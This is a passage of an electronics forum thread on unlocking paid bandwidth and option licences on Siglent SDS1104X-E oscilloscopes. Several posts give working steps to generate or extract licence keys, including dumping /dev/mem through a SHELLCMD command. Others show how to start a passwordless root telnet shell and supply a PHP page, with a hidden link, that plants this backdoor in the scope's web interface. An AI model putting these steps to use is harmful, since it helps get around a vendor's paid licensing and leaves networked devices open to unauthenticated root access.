« Reply #153 on: October 27, 2019, 02:39:02 pm »
Well, my theory is difficult to test with the new FW (that fuses a lot of Siglent's SDS), specially without a scope. So, let it rest...

BTW, the new SDS1xx4X-E_6.1.33 firmware is able to run in the following equipments (the FW includes their respective version!!!):

     Product Type           FW version
0 - SDS1002X-E          1.3.19
1 - SDS1004X-E          6.1.33
2 - SDS2000X-E          1.1.18
3 - SDS5000X             0.8.2R1
4 - SLA1016                8.1.9
5 - SDS2000X+           1.1.8
6 - ZODIAC-                1.0.0.0


Very interesting!
« Last Edit: October 27, 2019, 04:12:19 pm by tv84 »
 
The following users thanked this post: djadeski

Offline jemangedeslolos

  • Frequent Contributor
  • **
  • Posts: 355
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #154 on: October 27, 2019, 03:26:32 pm »
 :popcorn:
 

Offline aimc

  • Contributor
  • Posts: 22
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #155 on: October 31, 2019, 12:04:28 pm »
Kai, your won't need much of your Christmas holiday for this upgrade hack. It can be done within a few minutes :). All you have to do is to establish a network connection and to run the here posted Python code with your scope ID and to paste the keys that are generated. You can also undo all changes that you have made to original specs. Let me know off the blog if you have more questions (I am German speaking too).
Cheers, Lutz
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #156 on: October 31, 2019, 02:33:31 pm »
Just bought a SDS1104X-E and already downloaded the python-script. But I have no need for more than 100 MHz for the moment, therefore I will play around with the "upgrade" in my holiday time. For that time I can lent a good function generator and probes from my work to cross-check the advancements.

But for the first time I checked my (cheap) Feeltech FY6900/60 function generator I bought for arduino-datalogging-experiments in summer... and the signal isn't as good as I expected. For the moment I have to read these threads to get some knowledge what the nominal values should be.

And I have to look around in the threads in the forum to get some pictures of the "grounded" Signals for the oscilloscope... my low V/DIV "flatline"-readouts look some kind of noisy.
 

Offline Hfe72

  • Newbie
  • Posts: 1
  • Country: aq
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #157 on: November 10, 2019, 10:28:24 am »
Hi all! I am newbie and I have some questions about updating my SDS1104X-E (Current FW is 6.1.26):

I have done memorydump, but not yet activating wifi, 200 MHz etc.. So should I first upgrade FW to 6.1.33, and next install Plurs .ads file from usbstick? And what is Python file, I can't find it ?

Could someone please send me more detailed instructions on the upgrade via PM?

Thanks



« Last Edit: November 11, 2019, 11:47:26 am by Hfe72 »
 

Offline aimc

  • Contributor
  • Posts: 22
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #158 on: November 13, 2019, 08:07:41 pm »
Hi all! I am newbie and I have some questions about updating my SDS1104X-E (Current FW is 6.1.26):

I have done memorydump, but not yet activating wifi, 200 MHz etc.. So should I first upgrade FW to 6.1.33, and next install Plurs .ads file from usbstick? And what is Python file, I can't find it ?

Could someone please send me more detailed instructions on the upgrade via PM?

Thanks

Well, I had my fair share of mishaps, but now I can say with confidence that everything is quiet trivial. Here is what worked for me:

1) I updated to 6.1.33 but as I understood from others you don't have to. All license changes will be persistent after FW changes.
2) Connect your scope to your local network and write down the IP address. You can also use the USB if you don't have LAN, in this case skip to (4).
3) Use IE or other browser from a PC in that LAN simply by the IP address (http://xxx.yyy.zzz.aaa).
4) Your scope answers you with a web page containing 4 big buttons on the left, push the bottom (SPCI control) one.
5) In the command line enter SCOPEID? and receive your scope ID in the text window below, write it down, remove the dashes.
6) Have your scope's serial number ready. Get it from either your cal sheet or from scope Info button, or finally via SPCI command *IDN? (it returns comma separated model, SN, SW version)
7) Get the updated (!) Python code from here: (The updated link from wgoeo goes to a website that can also run the code).

I haven't fully tested this but the output matches the bandwidth keys in reply #89.
Needs Python 3, just replace the serial and run.

Edit: Update, thanks tinhead!

8 ) Enter 16 character Scope ID (remove the dashes inbetween!) and the 14 character serial number in the corresponding placeholders of the py-code file.
9) Run the Python code, either on your PC if you have PyCharm or Visual Studio or find an online Python engine where you can paste the patched py code and run it. Most simple is to just run it off the website provided by wgeoe. There you can also paste your ID/SN in.
10) Pick the for the SDS1000X-E relevant keys from the result (100M, 200M, AWG, WIFI, MSO).
11) Go back to the SPCI terminal and install the bandwidth key with MCBD <key> (e.g. MCBD 0123456789ABCDEF). If the key was taken you will see with MCBD?. Then the same key you just entered appears in the result window. Also you can see instantly that the scope has now changed model number. (No scope restart is needed, result is immediate. You even see the change in noise when in the 0.5mV range with nothing connected).
12) Now install the SW options. On the SPCI use LCISL <option> <key> (Option AWG, WIFI, MSO), (e.g. LCISL WIFI 0123456789ABCDE). I used the scope's function to enter the key under Utilities, Options, on one of the pages select one of the three options and press install button to enter the key, scope will answer "License key installed" (make sure the key is correct, I fell victim to my own handwriting and almost gave up until I noticed that I mistook Z for a 2  |O ).
13) Although changes are imminent, for sanity reboot the scope and do a calibration.
14) Congratulations you are done. Don't forget to thank wgoeo and tinhead.

cheers
Lutz
 
The following users thanked this post: m12lrpv, patman27, 5370H55V, thaistatos, Manx, Sinatek, Hfe72, jlo

Offline 5370H55V

  • Contributor
  • Posts: 14
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #159 on: November 15, 2019, 11:01:50 pm »

Well, I had my fair share of mishaps, but now I can say with confidence that everything is quiet trivial. Here is what worked for me:

1) I updated to 6.1.33 but as I understood from others you don't have to. All license changes will be persistent after FW changes.
2) Connect your scope to your local network and write down the IP address. You can also use the USB if you don't have LAN, in this case skip to (4).
3) Use IE or other browser from a PC in that LAN simply by the IP address (http://xxx.yyy.zzz.aaa).
4) Your scope answers you with a web page containing 4 big buttons on the left, push the bottom (SPCI control) one.
5) In the command line enter SCOPEID? and receive your scope ID in the text window below, write it down, remove the dashes.
6) Have your scope's serial number ready. Get it from either your cal sheet or from scope Info button, or finally via SPCI command *IDN? (it returns comma separated model, SN, SW version)
7) Get the updated (!) Python code from here: (The updated link from wgoeo goes to a website that can also run the code).

I haven't fully tested this but the output matches the bandwidth keys in reply #89.
Needs Python 3, just replace the serial and run.

Edit: Update, thanks tinhead!

8 ) Enter 16 character Scope ID (remove the dashes inbetween!) and the 14 character serial number in the corresponding placeholders of the py-code file.
9) Run the Python code, either on your PC if you have PyCharm or Visual Studio or find an online Python engine where you can paste the patched py code and run it. Most simple is to just run it off the website provided by wgeoe. There you can also paste your ID/SN in.
10) Pick the for the SDS1000X-E relevant keys from the result (100M, 200M, AWG, WIFI, MSO).
11) Go back to the SPCI terminal and install the bandwidth key with MCBD <key> (e.g. MCBD 0123456789ABCDEF). If the key was taken you will see with MCBD?. Then the same key you just entered appears in the result window. Also you can see instantly that the scope has now changed model number. (No scope restart is needed, result is immediate. You even see the change in noise when in the 0.5mV range with nothing connected).
12) Now install the SW options. On the SPCI use LCISL <option> <key> (Option AWG, WIFI, MSO), (e.g. LCISL WIFI 0123456789ABCDE). I used the scope's function to enter the key under Utilities, Options, on one of the pages select one of the three options and press install button to enter the key, scope will answer "License key installed" (make sure the key is correct, I fell victim to my own handwriting and almost gave up until I noticed that I mistook Z for a 2  |O ).
13) Although changes are imminent, for sanity reboot the scope and do a calibration.
14) Congratulations you are done. Don't forget to thank wgoeo and tinhead.

cheers
Lutz

Thanks, the steps worked for me and after some hiccups I got both the bandwidth and options loaded. :D

I had some difficulty following the instruction for using USB to connect directly and had to figure it out myself. Turns out you need to install NI MAX and EasyScopeX from Siglent first in order for the scope to be detected properly when its connected. Once it is, you can then use the terminal window in EasyScope to input the commands as described from step 5 onwards.

Also wanted to add that changing the bandwidth through the terminal worked, but unlocking the options didn't (although LAN users might not have this problem). For that I had to select the option (AWG, WIFI, MSO) with the scope buttons and unlock it by manually inputting the key on the scope itself.
 

Offline Omniata

  • Newbie
  • Posts: 1
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #160 on: December 28, 2019, 11:43:52 pm »
I'd just like to confirm the hack works on the SDS2202X-E, for the AWG, MSO and WIFI options, although, I had to use the codes generated from the webpage/script and input them manually on the scope.
I bought a TP-LINK WN725N adaptor off Amazon, plugged it in and WIFI working with no countdown.

Now I need a hack to make my own MSO/16-bit logic interface, it looks like a HDMI socket, but I'm not 100%.
ex ovo omnia...
 

Offline Calvin

  • Regular Contributor
  • *
  • Posts: 110
  • Country: de
    • Calvin´s audio page
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #161 on: December 29, 2019, 09:09:14 am »
Hi,

owning a SDS1204X-E I just wanted to unlock the other options.
Using the py script from above linked wgoeo´s website one only needs the serial-no. of the scope.
No need to hook up the scope via USB or LAN.
The scope-Id is the only required for bandwidth unlocking.
Just replace the string for the serial-no. and run the script and put in the codes manually.

regards
Calvin
..... it builds character!
 

Offline Madcat129

  • Newbie
  • Posts: 1
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #162 on: February 13, 2020, 08:26:55 am »
I recently picked up this new scope and "upgraded" it to SDS1204X-E with 200MHz with AWG, WIFI and MSO and have been having quite a few problems with crashing and bootlooping at the logo screen. Has anyone experienced any of these issues or is it related to my scope?
 

Offline Steve8080

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #163 on: February 29, 2020, 12:11:46 am »
did you ever solve it?
 

Offline dropkick

  • Contributor
  • Posts: 38
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #164 on: February 29, 2020, 01:59:57 am »
Did the full SDS1104X-E to SDS1204X-E "upgrade", BW and all options, two weeks ago now. v6.1.33 before and after.  No worries whatsoever.  :-+
 

Offline ArcticPhoenix0

  • Contributor
  • Posts: 34
  • Country: us
  • If it looks like I know what I'm doing, just wait.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #165 on: March 07, 2020, 02:35:11 pm »
I get a memdump file but it's 0 bytes.
All necessary informations are here and found by others (thank to them :-+).
To summarize, I put what I use below (English and French). I use the technics of memory dump which works very well and avoids flashing an alternative firmware.

English:
All of this only works with firmware <= 6.1.26, from firmware 6.1.33 the SHELLCMD is deactivated. But you can downgrade the scope to 6.1.26 to find the keys and after upgrade it to the last version.
  • Have a USB stick that is recognized by the oscilloscope (make a screenshot on it to try)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result, it is like wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to get the serial number like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (we will say 1mn, there is 240MB to write on the USB stick)
  • Put the USB stick on a computer, there must be a file memdump.bin
  • Open this file in a Hex editor (I use HxD on windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • We must have just before a 100M (or 200M according to its oscilloscope), it's the active bandwidth and still a little (37 characters) above SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (that we cut in half), which makes us 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license it is necessary to send the command SCPI MCBD key and to turn off/on again the scope
  • Start again from the beginning of the file and look for its serial number (SDSxxxxxxxxxxxx), search until find the one where it is written MSO 5 characters before
  • A little lower (69 or 117 characters) a group of readable characters, there are 3 groups of 16 characters which correspond to the activation key of options, if this key appears 2 times is that it's already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the command SCPI LCISL option,key
An interesting SCPI command to explore the scope (warning to not brick it), SHELLCMD telnetd -l/bin/sh -p9999 open a telnet (root shell) without password.

Français:
Tout ceci ne fonctionne qu'avec un firmware <= 6.1.26, à partir du firmware 6.1.33 la commande SHELLCMD a été désactivé. Mais vous pouvez rétrograder votre oscilloscope avec le firmware 6.1.26 pour trouver les clefs, puis remettre le dernier firmware.
  • Avoir une clef USB qui est reconnu par l'oscilloscope (faire une copie d'écran dessus pour essayer)
  • Se connecter à l'oscilloscope avec l'interface web
  • Dans l'onglet SCPI, envoyer la commande SCOPEID? et noter le résultat, il est sous la forme wwww-xxxx-yyyy-zzzz
  • Envoyer la command *IND? on récupère le numéro de série sous la forme SDSxxxxxxxxxxxx
  • Envoyer la commande SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Attendre un certain temps que cette commande se termine (on va dire 1mn, il y a 240Mo à écrire sur la clef USB)
  • Mettre la clef USB sur un ordi, il doit y avoir un fichier memdump.bin
  • Ouvrir ce fichier dans un éditeur Hexa (J'utilise HxD sous windows)
  • Chercher son SCOPEID sans les - (donc wwwwxxxxyyyyzzzz)
  • On doit avoir juste avant un 100M (ou 200M en fonction de son oscilloscope), c'est la bande passante active et encore un peu (37 caractères) au dessus SDS1000X-E
  • Un peu plus bas (116 caractères) il doit y avoir des lettres, en fait 2 groupes de 16 caractères et un de 32 caractères (que l'on coupe en deux), ce qui nous fait 4 groupes de 16 caractères correspondant à la clef pour activer l'option de bande passante (respectivement 100MHz, 200MHz, 50MHz, 70MHz)
  • Pour activer la licence correspondant il faut envoyer la commande SCPI MCBD clef et éteindre/rallumer le scope
  • Repartir du début du fichier et chercher son numéro de série (SDSxxxxxxxxxxxx), chercher jusqu'à trouver celui ou il est écrit MSO 5 caractères avant
  • On a un peu plus bas (69 ou 117 caractères) un groupe de caractères lisibles, il y a 3 groupes de 16 caractères qui correspondent à la clef d'activation des options, si cette clef apparaît 2 fois c'est qu'elle est déjà active. Les options sont respectivement (AWG, WIFI, MSO) et peuvent être activé avec la commande SCPI LCISL option,clef
Une commande SCPI intéressante pour explorer l'oscilloscope (attention de ne pas tout casser), SHELLCMD telnetd -l/bin/sh -p9999 ouvre un accès telnet (root shell) sans mot de passe.
 

Offline ArcticPhoenix0

  • Contributor
  • Posts: 34
  • Country: us
  • If it looks like I know what I'm doing, just wait.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #166 on: March 08, 2020, 12:14:40 am »
Now that I've unlocked my Siglent 1104X-E to a 1204X-E, what passive probe upgrade do you recommend? Looking to try to keep it under $30 per probe.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #167 on: March 08, 2020, 12:26:58 am »
Now that I've unlocked my Siglent 1104X-E to a 1204X-E, what passive probe upgrade do you recommend? Looking to try to keep it under $30 per probe.
None.
PP510 probes are within 1db of PP215 probes to 200+ MHz.

Otherwise take your pick here:
https://siglentna.com/products/accessories/probes/passive-probes/
« Last Edit: May 05, 2020, 07:21:16 pm by tautech »
Avid Rabid Hobbyist
 
The following users thanked this post: patman27

Offline spy

  • Contributor
  • Posts: 6
  • Country: pl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #168 on: April 13, 2020, 07:14:12 pm »
Well, I did "improve" my device as well, and here is my small feedback. Key for 200MHz bandwith generated on website https://repl.it/repls/GainsboroAlienatedText doesn't work. At least it didn't work for me. Mem dump was necessary. On the other hand web-generated keys for options do work. One can apply them either via Utility menu or web interface (SCPI tab).

EDIT: codes generated from this link work (even for 200MHz bandwith): https://repl.it/repls/JauntyAccurateGraphics . I don't know why it didn't work from previous one and I don't have time to investigate. Just generate it and you can skip 1-8 from following guide. However if you need telnet for some reason, you still have to downgrade firmware in you device.

A bit reviewed howto and some additions:

1.   Make sure your oscilloscope is flashed with fw 6.1.26 (6.1.33 and above have some commands disabled)
2.   Insert USB stick and make sure it is detected by the oscilloscope.
3.   Connect to the oscilloscope with the web interface (via LAN or WiFi).
4.   In the SCPI tab send the command MCBD? and note the result.
5.   In the SCPI tab send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin and wait until it is stored on your USB stick (15 seconds should be enough).
6.   Copy the memdump.bin file to your computer and open it with your favorite text editor (Notepad is just fine, the simpler the better).
7.   Find in your memdump.bin file 16 characters string from MCBD? command (in fact it is a 100MHz license key)
8.   Right next the 100MHz key you just found there is a 200MHz unlock key, and a bit lower there are keys for oscilloscope options. Each one is 16-characters long key. Please note, AWG, WiFi and MSO keys are stored as one string and have to be splited (take a look at the picture in attachment).
9.   In the SCPI tab send the command LCISL option,key (no reboot is required, you can see the result immediately by pressing "Utility->Options->Information" on your oscilloscope)
10. In the SCPI tab send the command MCBD 200MHzKey. Turning off/on the oscilloscope is NOT required to start using new bandwidth, you should see changes in waveform on oscilloscope screen immediately. Double check if oscilloscope has accepted the bandwidth key by sending SCPI command MCBD? - the 200MHz key should be returned as a result - or verify if oscilloscope introduces itself as SDS2104X-E (either via SCPI tab on webpage or by using the Utility menu). You can flash your oscilloscope to the latest firmware now (bandwidth and options keys will stay active) or keep reading this post...
11. It is good practice to write down your keys (even 100MHz if you would like to revert your changes by sending SCPI command MCBD 100MHzKey, re-enabling 200MHz bandwidth will be still possible) and even keep the memdump file.

If you're familiar with linux console you can take advantage on following information:

12. /usr/bin/siglent/firmdata0/NSP_system_info.xml is where your oscilloscope serial number and MAC is stored
13. /usr/bin/siglent/firmdata0/bandwidth.txt is where your bandwidth license is stored.
14. Option license key is stored in i.e.  /usr/bin/siglent/firmdata0/options_wifi_license.txt
15. Startup counter is stored in /usr/bin/siglent/usr/config/NSP_usr_system_info.xml
16. Options usage counters are stored in /usr/bin/siglent/usr/usr/options_$option$_times.txt. Seems like the device has 1153b, i2s, CAN and flx options factory activated.
17. Looking at /lib/firmware/ you can come to conclusion that any WiFi dongle based on mt7601u, rt2870 or rtl8188eu should be supported by the oscilloscope. However most likely modules are loaded from /usr/bin/siglent/drivers and there is a driver for mt7601u only. It is possible to build your own driver using kernel 3.19.0 and xilinx BSP and upload it to this directory to i.e. unlock possibility to connect to 5GHz WiFi network using different dongle.
18. After flashing to fw newer that 6.1.26 SCPI SHELLCMD is no longer supported. To keep the possibility to explore your oscilloscope via telnet you can mount -o rw,remount /usr/bin/siglent than go ahead with vi /usr/bin/siglent/config/www/telnetd.php and paste following code (no, I'm not a PHP developer, sorry for the code quality):
Code: [Select]
<?php
// /usr/bin/siglent/config/www/telnetd.php
$port 9999;
print 
"Checking for telnet daemon on port $port : ";
echo (
$output shell_exec("[[ \"$( ps | grep  ".$port." | grep -v grep )\" ]] && echo \"RUNNING\" || echo \"NOT STARTED\"")), "<br />";
if (
strncmp($output"RUNNING"7)) {
 print 
"Starting telnetd... ";
 
shell_exec("telnetd -l/bin/sh -p'".$port."'");
 echo (
shell_exec("[[ \"$(ps | grep  ".$port." | grep -v grep)\" ]] && echo \"SUCCESS\" || echo \"FAILED\"")), "<br />";
}
system("ps ax | grep  '".$port."' | grep -v grep");
?>

From now on http://oscilloscope_IP/telnetd.php will start telnet daemon in your oscilloscope. Until Siglent disable that possibility with future firmware update. You can take a step further to modify /usr/bin/siglent/config/www/welcome.php by adding:

Code: [Select]
<div class="div-inline2 aboutlink" style="display:none">
            <a target="_blank"  class="about_link" href="telnetd.php">Start telnetd</a>
</div>

at the end of class="side_bar" and have it available from the oscilloscope's main web page.

0000. Keep in mind you should make backup of every file you modify. Playing with root privileges on rw mounted file-system is also a bit dangerous, so be careful to not brick your oscilloscope. Don't mess up if you're not familiar with linux.
 


« Last Edit: May 23, 2020, 03:41:26 pm by spy »
 
The following users thanked this post: stigwurx, patman27

Offline physicsmajor

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #169 on: April 29, 2020, 12:41:05 am »
Recently received a SDS1104X-E, arrived with .33 firmware.  No downgrading or firmware dump necessary.

Small correction to aimc's post which is largely a great guide above https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/msg2783212/#msg2783212

When using LCISL the format is "LCISL OPTION,KEYXXXXXXXXXXXX" - note the comma!  A space between option and the key does not take.  This is probably why changing bandwidth worked for above poster 5370H55V but the options did not.  Use this format and you can do everything over the network.  I did not get a handshake back over SCPI for the options, just "command sent successfully", but they were immediately permanently activated on the scope.

After generating your keys, recommend the first SCPI command should be "MBCD?" - this queries the scope and returns the key generated named "100M".  If your generated key for 100M matches what the scope returned, all of the keys are good.  If not, you need to double check your SN/SCOPEID in the Python script; none will work if the built-in 100M doesn't match.  If you ever need to revert to 100Mhz bandwidth (warranty service or whatever), that key will do it.
« Last Edit: April 29, 2020, 12:44:06 am by physicsmajor »
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #170 on: April 30, 2020, 01:41:25 pm »
Hi,

ist there a way to deactivate option keys?

Just in case it is neccesary to return the unit for warranty...

Chris
 

Offline 705jas

  • Newbie
  • Posts: 3
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #171 on: May 03, 2020, 11:46:07 am »
Hi All

Sorry if this has been asked before (couldnt find it?) but I have successfully done the bandwidth upgrade on my 1104x (.26 firmware) but just wondering if you are still able to do firmware upgrades after this hack?

Thanks in advance.
 

Offline Nikolas

  • Newbie
  • Posts: 2
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #172 on: May 05, 2020, 04:06:27 pm »
Hey guys, I'm thinking about buying the SDS1104X-E, does anyone know if this still works on the current firmware 6.1.35R2 (Release Date 03.07.20)?

Thanks
« Last Edit: May 05, 2020, 05:39:16 pm by Nikolas »
 

Offline spy

  • Contributor
  • Posts: 6
  • Country: pl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #173 on: May 05, 2020, 11:28:46 pm »
@Nikolas just follow the guide. No worries.

@705jas yes you are.

@Ringmodulator yes it is possible but why would you like to do this? Besides, only option worth activation is a WiFi with purchasing a TP-Link dongle on-line. AWG and MSO options require additional hardware to be purchased in order to use them.
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #174 on: May 07, 2020, 12:40:48 pm »
@Ringmodulator yes it is possible but why would you like to do this? Besides, only option worth activation is a WiFi with purchasing a TP-Link dongle on-line. AWG and MSO options require additional hardware to be purchased in order to use them.

@spy,
just in case, one has to send his unit back for waranty and wants to remove an unofficial key/option upfront.

 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #175 on: May 14, 2020, 04:49:17 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope will automatically find the network with this SSID and you can choose it.
So, this looks just fine.

But the scope will not connect to the network and will not get an IP assigned.

As soon, as you rename the network with a SSID, that has no space in the name, everything is OK.

Verified wit FW 6.1.33, not checked with 6.1.35R2

So check your SSID, before blaming the WLAN dongle.

Chris
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #176 on: May 14, 2020, 07:10:42 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #177 on: May 14, 2020, 09:13:05 pm »
Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

Honestly this is just false on its face. I have yet to come across a single device that cannot handle a space in the SSID. Every smart phone on Earth can handle that. $2 IoT devices from eBay have no problems with this.

This is a bug or a really, really stupid feature and it needs to be fixed.

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #178 on: May 16, 2020, 06:09:56 pm »
Every smart phone on Earth can handle that. $2 IoT devices from eBay have no problems with this.

This is a bug or a really, really stupid feature and it needs to be fixed.

i make it for you very simple

https://lmgtfy.com/?q=ssid+space+character+connection+problem

give's me 207.000.000 result. You right, no single device on earth ever got such Problem  :o
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #179 on: May 23, 2020, 06:46:42 pm »

Quote
@Ringmodulator yes it is possible but why would you like to do this? Besides, only option worth activation is a WiFi with purchasing a TP-Link dongle on-line. AWG and MSO options require additional hardware to be purchased in order to use them.

@spy

Do you mind to share?
 

Offline spy

  • Contributor
  • Posts: 6
  • Country: pl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #180 on: May 29, 2020, 10:42:47 am »
Deleting the file with option key stored should do the trick. You can also reset the usage counter to 30 for each option. Just take a look at 14. and 16. from my post.
 

Offline Chris Roubis

  • Contributor
  • Posts: 21
  • Country: au
  • Chris Roubis
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #181 on: July 08, 2020, 11:41:43 am »
Just bought a SDS1104X-E and already downloaded the python-script. But I have no need for more than 100 MHz for the moment, therefore I will play around with the "upgrade" in my holiday time. For that time I can lent a good function generator and probes from my work to cross-check the advancements.

But for the first time I checked my (cheap) Feeltech FY6900/60 function generator I bought for arduino-datalogging-experiments in summer... and the signal isn't as good as I expected. For the moment I have to read these threads to get some knowledge what the nominal values should be.

And I have to look around in the threads in the forum to get some pictures of the "grounded" Signals for the oscilloscope... my low V/DIV "flatline"-readouts look some kind of noisy.

It's meant to look noisy... that's the beauty of sensitive digital oscilloscope... picks up everything an analogue doesn't.
Electricians have longer fuses
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #182 on: July 09, 2020, 08:54:25 am »
I've read some thread about this mod, but i've not found any hardware comparision  to see if the limitation is only in software/probles, or there is also something different in hardware, between the 2 models...
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #183 on: July 09, 2020, 09:28:31 am »
I've read some thread about this mod, but i've not found any hardware comparision  to see if the limitation is only in software/probles, or there is also something different in hardware, between the 2 models...

Can't believe you just wrtitten that. That theme has been analyzed over-and-over again in multiple threads. You just didn't read enough.

Maybe I'll resume it for you: the HW is exactly the same.  (well, technically, one has a "label" in the screen frame that shows 200 and the other shows 100...)
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #184 on: July 09, 2020, 10:55:07 am »
Evidently, i've missed something  |O As the threads are waaaay longs, i was searching for photos of the 2 boards, or the word "hardware"  :scared:
Thanks!
 

Offline tony359

  • Regular Contributor
  • *
  • Posts: 100
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #185 on: July 10, 2020, 03:36:22 pm »
Hi all

I've managed to set the bandwidth of my 1104 to 200Mhz (Thanks!!!) but I am unable to add the options. I tried both via SCPI and via front panel. I get "the data is invalid" on the scope when I press "Press to install".

I am using this script and the bandwidth code worked.

What am I doing wrong?

Thank you!

Edit: Gotcha.
On the Scope first you need to select the correct option as in the attached picture. THEN you input the corresponding code.
« Last Edit: July 10, 2020, 08:44:53 pm by tony359 »
 

Offline martinot

  • Regular Contributor
  • *
  • Posts: 81
  • Country: se
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #186 on: July 11, 2020, 03:53:00 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

You mean "it is not a bug, it is a "feature"?

For the record; I have always had spaces in all my SSID's for over 20 years, and never had any problem with that (it is part of the WiFi standard), with any device.
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #187 on: July 11, 2020, 06:12:52 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

You mean "it is not a bug, it is a "feature"?

For the record; I have always had spaces in all my SSID's for over 20 years, and never had any problem with that (it is part of the WiFi standard), with any device.

Your protests will fall on deaf ears.  I have tried to explain numerous times that this limitation is insane, and SSIDs with spaces, special characters, capital letters, etc are the norm and all I hear back is some variant of "change ur SSID LOL" or "millions of devices dont work with spaces".

This scope runs on linux.  Every linux distribution has the ability to accept spaces and special characters in the SSID. Siglent needs to fix this.  It is insane to limit this scope in such a fundamental, easily fixable way.
« Last Edit: July 11, 2020, 08:50:16 pm by SMB784 »
 

Offline pcc_37

  • Newbie
  • Posts: 2
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #188 on: July 23, 2020, 04:08:58 am »
I just wanted to thank everybody on this forum for the info on unlocking my new SDS1104X-E

Mine had been flashed b4 shipment to 35R2 and was fully up to date firmware wise.

I used the python script method and manual entry of the relevant codes via the scopes menu system to gain permanent
status on each of the three OPTIONS.

